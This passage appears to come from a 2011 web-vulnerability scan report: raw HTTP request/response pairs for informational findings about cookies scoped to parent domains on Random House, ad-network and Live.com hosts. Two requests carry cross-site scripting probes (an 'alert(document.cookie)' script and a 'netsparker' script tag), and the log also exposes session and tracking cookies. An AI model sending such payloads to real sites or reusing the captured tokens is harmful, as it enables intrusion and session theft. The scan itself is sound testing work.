Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 22:05:53 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DBA0E0851D07B4-400001370000750B[CE]; Expires=Sun, 24 Apr 2016 22:05:53 GMT; Domain=.randomhouse.com; Path=/
Location: http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831?AQB=1&pccr=true&vidn=26DBA0E0851D07B4-400001370000750B&&ndh=1&t=26%2F3%2F2011%2017%3A6%3A2%202%20300&ns=randomhouse&pageName=RH.com%20Homepage&g=http%3A%2F%2Fwww.randomhouse.com%2F&cc=USD&events=event8&c24=www.randomhouse.com%2F&v24=www.randomhouse.com%2F&c25=www.randomhouse.com%2F&v25=www.randomhouse.com%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 22:05:53 GMT
Last-Modified: Wed, 27 Apr 2011 22:05:53 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www384
Content-Length: 0
Content-Type: text/plain


13.38. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1117&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZFFAbh=845B826,20|798_845#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|1117_846#366Z798_845#365;expires=Wed, 25 Apr 2012 18:46:37 GMT;domain=.zedo.com;path=/;
ETag: "1822b1a-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2559125543
Cache-Control: max-age=44578
Expires: Wed, 27 Apr 2011 07:09:35 GMT
Date: Tue, 26 Apr 2011 18:46:37 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

13.39. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.bertelsmann.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 26 Apr 2011 23:30:14 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 26 May 2011 23:30:14 GMT; Path=/
Set-Cookie: di=%7B%7D..1303775135.1FE|1303860614.1OD|1303775135.60; Domain=.addthis.com; Expires=Thu, 25-Apr-2013 23:30:14 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 26 Apr 2011 23:30:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 26 Apr 2011 23:30:14 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

13.40. http://ecommerce.randomhouse.com/cart.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.do?from=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B6E)%3C/script%3E&addFlag=false&coupon=3&submit=Apply HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:47:26 GMT
Server: Apache
Set-Cookie: rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; Domain=.randomhouse.com; Expires=Wed, 25-Apr-2012 22:47:27 GMT
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19741


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

13.41. http://ehg-gaddispartners.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-gaddispartners.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM5710248PED62EN3&cd=1&hv=6&n=Setting%20MSN%20as%20your%20homepage&con=&vcon=/&tt=none&ja=y&dt=13&zo=300&lm=1290645554000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=u&vpc=HBX0250u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&cv.c49=&cv.c50=http%3A//www.myhomemsn.com/&rf=bookmark&pu=&pl=Shockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.240.7%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AChrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AWPI%20Detector%201.3%3AGoogle%20Update%3ADefault%20Plug-in%3A&lv.id=&lv.pos=&hid=0.7830267860554159 HTTP/1.1
Host: ehg-gaddispartners.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www.myhomemsn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%XrXe@%r@Q; CTG=1303671314

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:38:58 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM5710248PEDV6=V1eB(#X"rz%XrXiCX%Xi%er%@rz%zrzr"%XrXiCX%Xiz%XrXiCX%Xi"%XrXiCX%Xi"%XrXiCX%Xi%er%@r"rz(xB$}aff2TWxBrl}#xBrIFxBr3:DhxBrO:maGIWaz7}z)OuKr6QizA6}aff2TWHl}#HIFH3:DhHO:maGIWazu::dmIhd; path=/; domain=ehg-gaddispartners.hitbox.com; expires=Wed, 25-Apr-2012 18:38:58 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrXiCX%Xi; path=/; domain=.hitbox.com; expires=Wed, 25-Apr-2012 18:38:58 GMT; max-age=31536000
Set-Cookie: CTG=1303843138; path=/; domain=.hitbox.com; expires=Tue, 03-May-2011 18:38:58 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 26 Apr 2011 18:38:59 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.42. http://explore.live.com/Handlers/Plt.mvc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /Handlers/Plt.mvc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Handlers/Plt.mvc?bicild=&v=15.40.1075 HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/windows-live-messenger?os=other
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; wlidperf=throughput=13&latency=225; xid=ea42cfe4-9b1a-4293-9276-b9fa57650771&&TK2xxxxxxxxLP11&154; xidseq=1; mktstate=S=1623281324&U=&E=&P=&B=en-us; mkt1=norm=en-us; mkt2=marketing=en-us; wlexpid=ea42cfe4-9b1a-4293-9276-b9fa57650771; wlv=A|_-d:s*s449Bg.2+1+0+3; E=P:aEefTVjSzYg=:GbI7jyce+ASXkK6Lz5dzEj3wxAVVXrTJiiazZaS199c=:F; wla42=; cookiesEnabled=true; BP=VID=0.9254&VC=0&RC=1&LTT=1303843145271&l=WSC.Explore&FR=&ST=; LD=ea42cfe4-9b1a-4293-9276-b9fa57650771_0014ddf8c55_15501_1303843132949=L12308; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=31536000
Content-Length: 42
Content-Type: image/gif
Expires: Wed, 25 Apr 2012 18:39:09 GMT
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: E=P:y5dGXVjSzYg=:SNkzLa0DRaQJHW5nO0Gh5ui7VMJQkPzrYSKyCZ6j7C0=:F; domain=.live.com; path=/
Set-Cookie: pltmode=1; domain=.live.com; expires=Tue, 26-Apr-2011 18:39:19 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:39:09 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:39:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:39:08 GMT

GIF89a.............!.......,...........2.;

13.43. http://explore.live.com/windows-live-messenger  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /windows-live-messenger

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windows-live-messenger?os=other HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42292
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Set-Cookie: xid=42b3abd4-6447-433c-8c48-9965439b3738&&TK2xxxxxxxxLP11&154; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=1623281324&U=&E=&P=&B=en-us; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.explore.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 26-Apr-2011 16:58:38 GMT; path=/
Set-Cookie: wlexpid=42b3abd4-6447-433c-8c48-9965439b3738; domain=.live.com; expires=Tue, 26-Apr-2011 19:08:38 GMT; path=/
Set-Cookie: wlv=A|_-d:s*ro49Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: E=P:dHXjSljSzYg=:lte5DPYyGosUE7/z2qmjFVvinU2K9vatIhifomCYPC4=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:38:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

13.44. http://ib.adnxs.com/getuidu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:49 GMT; domain=.adnxs.com; HttpOnly
Location: http://a.rfihub.com/cm?apxuid=2724386019227846218&forward=
Date: Tue, 26 Apr 2011 18:46:49 GMT
Content-Length: 0


13.45. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=18&action=setuids('614741349159218131','1CAESEAcpLdw2F6J1UKMXA_aMRok');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://ib.adnxs.com/getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward=
Date: Tue, 26 Apr 2011 18:46:42 GMT
Content-Length: 0


13.46. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=9175 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1kUGf3P4S?x+>Vw#cli2Z%p3WmmQhjt9MdR#CxpF6tp*nq$Nxn<dWF!:QuYDKdseP_h)uJe.26/RX:N1BgJ?D-*wIgTR/'8!kfN=J6^H8$U<*(w#7`hLjeYl`CzVfnEs:6dsF57[+':o@4PCJUi>9^(fHj)#VwSLH:#4Gb1k`'//CV4WLv$glv8CT]v>0DbsqTI#+-X7W>Ick`C7pBmAXmXxR%ge`0M8X/f>NDHX+iEoDQSm4qj@!8HjdgqcY^7cwxlrbWW:X.i/bHKf_o_YEA/LyW)hFu@1/olvQM>q')Qb)rauFa94KII4KAI`UVZW5QvvWInWXio#:w1_scIl_O'$PK*w_BY.U##!MuX+Vqi8H11nF6CJf8gn+.75!Vt'v0`4hVA16S.*3^U5iP>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[WT6aI@mq; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 18:46:44 GMT

GIF89a.............!.......,........@..L..;

13.47. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=93da1b37-e1d8-4a3d-98bc-070baa31f827 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
